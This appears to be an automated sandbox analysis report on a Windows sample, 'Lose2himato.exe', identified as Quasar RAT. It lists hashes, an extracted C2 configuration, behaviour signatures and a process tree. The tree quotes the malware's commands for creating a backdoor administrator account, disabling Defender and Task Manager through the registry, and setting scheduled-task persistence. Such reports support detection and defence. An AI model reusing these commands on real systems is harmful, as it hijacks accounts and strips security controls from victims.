Analysis

  • max time kernel
    69s
  • max time network
    75s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    08-12-2024 19:15

Errors

Reason
Machine shutdown

General

  • Target

    Lose2himato.exe

  • Size

    135.3MB

  • MD5

    30b32bc02534355b906a37951b458808

  • SHA1

    61eada367af3558e45c8583e174cdef13e68b93b

  • SHA256

    6f08d8eb4044dd872b38ff8d6a2b6e86efa9f7d777cb1b09e1f575bfed9467a2

  • SHA512

    8735788ded8836ac0b5be86356263cba2899367964ca8711a8d89b84cecf8c50be799274bfae5d4c6b8bc5d4dea7f04f836f10bf230041677c61977299887839

  • SSDEEP

    786432:zl5HNB9mAbrDMZBfPPgs9TFMd15DeSqVO0EQWW2IxEm+KoZd7APUF85n9wwTtLwG:J5gOsPfmZ0/EmREdEPUF85nSUgTI

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

C2

himato667-58401.portmap.host:58401

Mutex

0e2bc079-3316-407c-a26f-115195d9fe5b

Attributes
  • encryption_key

    D14CC6B8490A41A48C1E115285B6932B9A857EA0

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Client Startup

  • subdirectory

    SubDir

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Disables Task Manager via registry modification
  • Indicator Removal: Network Share Connection Removal 1 TTPs 1 IoCs

    Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 7 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Drops file in System32 directory 2 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

  • System Location Discovery: System Language Discovery 1 TTPs 27 IoCs

    Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 6 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 1 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 6 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 7 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 9 IoCs
  • Suspicious use of FindShellTrayWindow 31 IoCs
  • Suspicious use of SendNotifyMessage 30 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\Lose2himato.exe
    "C:\Users\Admin\AppData\Local\Temp\Lose2himato.exe"
    1⤵
    • Checks computer location settings
    • Sets desktop wallpaper using registry
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4464
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c net user OWN3DbyHXM4TO /add
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3716
      • C:\Windows\SysWOW64\net.exe
        net user OWN3DbyHXM4TO /add
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:1996
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 user OWN3DbyHXM4TO /add
          4⤵
          • System Location Discovery: System Language Discovery
          PID:1836
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c net user OWN3DbyHXM4TO Test
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:888
      • C:\Windows\SysWOW64\net.exe
        net user OWN3DbyHXM4TO Test
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4728
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 user OWN3DbyHXM4TO Test
          4⤵
          • System Location Discovery: System Language Discovery
          PID:704
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c net localgroup Administrators "OWN3DbyHXM4TO" /add
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:3260
      • C:\Windows\SysWOW64\net.exe
        net localgroup Administrators "OWN3DbyHXM4TO" /add
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:2112
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 localgroup Administrators "OWN3DbyHXM4TO" /add
          4⤵
          • System Location Discovery: System Language Discovery
          PID:4736
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c net localgroup Administrators "%USERNAME%" /delete
      2⤵
      • Indicator Removal: Network Share Connection Removal
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4220
      • C:\Windows\SysWOW64\net.exe
        net localgroup Administrators "Admin" /delete
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4516
        • C:\Windows\SysWOW64\net1.exe
          C:\Windows\system32\net1 localgroup Administrators "Admin" /delete
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3328
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4064
      • C:\Windows\SysWOW64\reg.exe
        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Microsoft Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1464
    • C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\better.exe
      "C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\better.exe"
      2⤵
      • Executes dropped EXE
      • Drops file in System32 directory
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1980
      • C:\Windows\SYSTEM32\schtasks.exe
        "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:440
      • C:\Windows\system32\SubDir\Client.exe
        "C:\Windows\system32\SubDir\Client.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:4372
        • C:\Windows\SYSTEM32\schtasks.exe
          "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:1072
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1xKeyi5KcMKN.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:4056
          • C:\Windows\system32\chcp.com
            chcp 65001
            5⤵
            PID:3580
          • C:\Windows\system32\PING.EXE
            ping -n 10 localhost
            5⤵
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:2956
          • C:\Windows\system32\SubDir\Client.exe
            "C:\Windows\system32\SubDir\Client.exe"
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SendNotifyMessage
            PID:768
            • C:\Windows\SYSTEM32\schtasks.exe
              "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
              6⤵
              • Scheduled Task/Job: Scheduled Task
              PID:3740
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RwijEhf9UHIt.bat" "
              6⤵
              PID:3084
              • C:\Windows\system32\chcp.com
                chcp 65001
                7⤵
                PID:2936
              • C:\Windows\system32\PING.EXE
                ping -n 10 localhost
                7⤵
                • System Network Configuration Discovery: Internet Connection Discovery
                • Runs ping.exe
                PID:4580
              • C:\Windows\system32\SubDir\Client.exe
                "C:\Windows\system32\SubDir\Client.exe"
                7⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                • Suspicious use of SendNotifyMessage
                PID:5716
                • C:\Windows\SYSTEM32\schtasks.exe
                  "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
                  8⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:5928
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iLHdomMqQ84D.bat" "
                  8⤵
                  PID:6140
                  • C:\Windows\system32\chcp.com
                    chcp 65001
                    9⤵
                    PID:5196
                  • C:\Windows\system32\PING.EXE
                    ping -n 10 localhost
                    9⤵
                    • System Network Configuration Discovery: Internet Connection Discovery
                    • Runs ping.exe
                    PID:1332
                  • C:\Windows\system32\SubDir\Client.exe
                    "C:\Windows\system32\SubDir\Client.exe"
                    9⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of FindShellTrayWindow
                    • Suspicious use of SendNotifyMessage
                    PID:884
                    • C:\Windows\SYSTEM32\schtasks.exe
                      "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
                      10⤵
                      • Scheduled Task/Job: Scheduled Task
                      PID:5468
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oC8cbSowU7FX.bat" "
                      10⤵
                      PID:5812
                      • C:\Windows\system32\chcp.com
                        chcp 65001
                        11⤵
                        PID:5932
                      • C:\Windows\system32\PING.EXE
                        ping -n 10 localhost
                        11⤵
                        • System Network Configuration Discovery: Internet Connection Discovery
                        • Runs ping.exe
                        PID:5548
                      • C:\Windows\system32\SubDir\Client.exe
                        "C:\Windows\system32\SubDir\Client.exe"
                        11⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of FindShellTrayWindow
                        • Suspicious use of SendNotifyMessage
                        PID:5332
                        • C:\Windows\SYSTEM32\schtasks.exe
                          "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
                          12⤵
                          • Scheduled Task/Job: Scheduled Task
                          PID:4224
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JKeFtiYCgpEc.bat" "
                          12⤵
                          PID:548
                          • C:\Windows\system32\chcp.com
                            chcp 65001
                            13⤵
                            PID:4456
                          • C:\Windows\system32\PING.EXE
                            ping -n 10 localhost
                            13⤵
                            • System Network Configuration Discovery: Internet Connection Discovery
                            • Runs ping.exe
                            PID:2516
                          • C:\Windows\system32\SubDir\Client.exe
                            "C:\Windows\system32\SubDir\Client.exe"
                            13⤵
                            • Checks computer location settings
                            • Executes dropped EXE
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of FindShellTrayWindow
                            • Suspicious use of SendNotifyMessage
                            PID:5604
                            • C:\Windows\SYSTEM32\schtasks.exe
                              "schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Windows\system32\SubDir\Client.exe" /rl HIGHEST /f
                              14⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:5400
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xzzIzv7WLRpb.bat" "
                              14⤵
                              PID:4540
                              • C:\Windows\system32\chcp.com
                                chcp 65001
                                15⤵
                                PID:5668
                              • C:\Windows\system32\PING.EXE
                                ping -n 10 localhost
                                15⤵
                                • System Network Configuration Discovery: Internet Connection Discovery
                                • Runs ping.exe
                                PID:2508
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1028
      • C:\Windows\SysWOW64\reg.exe
        REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\MySingleFileApp\wallpaper.bmp /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:2664
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:4264
      • C:\Windows\SysWOW64\reg.exe
        REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v WallpaperStyle /t REG_SZ /d 3 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:3296
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1632
      • C:\Windows\SysWOW64\reg.exe
        REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:1272
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2516
      • C:\Windows\SysWOW64\reg.exe
        REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableGpedit /t REG_DWORD /d 1 /f
        3⤵
        • System Location Discovery: System Language Discovery
        PID:4932
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start https://x.com/Lose2hxm4to
      2⤵
      • System Location Discovery: System Language Discovery
      PID:1928
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://x.com/Lose2hxm4to
        3⤵
        PID:2428
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7ffeeac646f8,0x7ffeeac64708,0x7ffeeac64718
          4⤵
          PID:1588
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2148,12190655202084161576,9499635611112659034,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:2
          4⤵
          PID:1960
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2148,12190655202084161576,9499635611112659034,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2244 /prefetch:3
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:2336
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /c start https://discord.gg/8eGVMdaD
      2⤵
      • System Location Discovery: System Language Discovery
      PID:4568
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/8eGVMdaD
        3⤵
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        PID:392
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffeeac646f8,0x7ffeeac64708,0x7ffeeac64718
          4⤵
          PID:2636
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2200 /prefetch:2
          4⤵
          PID:2888
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 /prefetch:3
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:704
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2904 /prefetch:8
          4⤵
          PID:1500
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
          4⤵
          PID:4056
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
          4⤵
          PID:1560
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3868 /prefetch:1
          4⤵
          PID:2808
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4944 /prefetch:1
          4⤵
          PID:5168
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4948 /prefetch:1
          4⤵
          PID:5204
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1
          4⤵
          PID:3880
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5336 /prefetch:8
          4⤵
          PID:3864
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3616 /prefetch:8
          4⤵
          • Modifies registry class
          • Suspicious behavior: EnumeratesProcesses
          PID:2168
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:1
          4⤵
          PID:1040
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4952 /prefetch:1
                                                            4⤵
                                                              PID:5560
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6508 /prefetch:8
                                                              4⤵
                                                                PID:6016
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6508 /prefetch:8
                                                                4⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:5476
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6536 /prefetch:1
                                                                4⤵
                                                                  PID:1992
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6552 /prefetch:1
                                                                  4⤵
                                                                    PID:5492
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1
                                                                    4⤵
                                                                      PID:1920
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3904 /prefetch:1
                                                                      4⤵
                                                                        PID:4580
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2176,9570117544411632134,10682455093482256988,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1848 /prefetch:1
                                                                        4⤵
                                                                          PID:5068
                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                      "C:\Windows\System32\cmd.exe" /c shutdown /r
                                                                      2⤵
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:5912
                                                                      • C:\Windows\SysWOW64\shutdown.exe
                                                                        shutdown /r
                                                                        3⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:1496
                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                    1⤵
                                                                      PID:964
